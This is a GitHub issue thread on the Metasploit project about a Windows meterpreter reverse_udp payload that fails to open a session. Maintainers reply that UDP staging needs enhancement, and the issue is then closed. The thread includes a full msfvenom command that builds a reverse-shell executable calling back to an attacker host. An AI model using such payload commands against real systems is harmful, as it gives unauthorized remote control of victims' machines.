### ISSUE TITLE
meterpreter reverse_udp cant open session

### ISSUE THREAD

**Issue by kxcode** [rapid7/metasploit-framework#10470]
MSF version is` metasploit v4.17.3-dev`
attacker's system is kali
victim's system is `Win 10.0.17134 Build 17134`

command to generate payload:
`msfvenom -p windows/meterpreter/reverse_udp LHOST=192.168.129.135 LPORT=8080 -f exe > ~/Desktop/mtp_reverse_udp.exe`

but the msf cant establish a session after running payload on Win10:
<img width="681" alt="udp_error" src="https://user-images.githubusercontent.com/3346178/44223037-0c2b8300-a1b9-11e8-9ce9-177530e6ebe4.png">

**Comment by kxcode** [comment]
can anyone give some help?

**Comment by kxcode** [comment]
Thank you for your response. Is it possible making meterpreter transfer in udp only?

**Comment by jmartin-r7** [comment]
Based on a short review of the code state today, I believe just delivering meterpreter would still require some enhancement. The steps you took actually delivered a payload via UDP however, I believe to get things working, you would need to expand the handler and deliver a revised stage that contains separate handler configuration details to receive the session.  Also this "assumes" the initial payload actually receives every packet of the stage delivered and successfully executes the new stage.

**Comment by ccondon-r7** [comment]
I'm gonna close this for now since it's been so long since it was active, but we can use the `meterpreter` label internally to track enhancement requests for Meterpreter dev in the future!
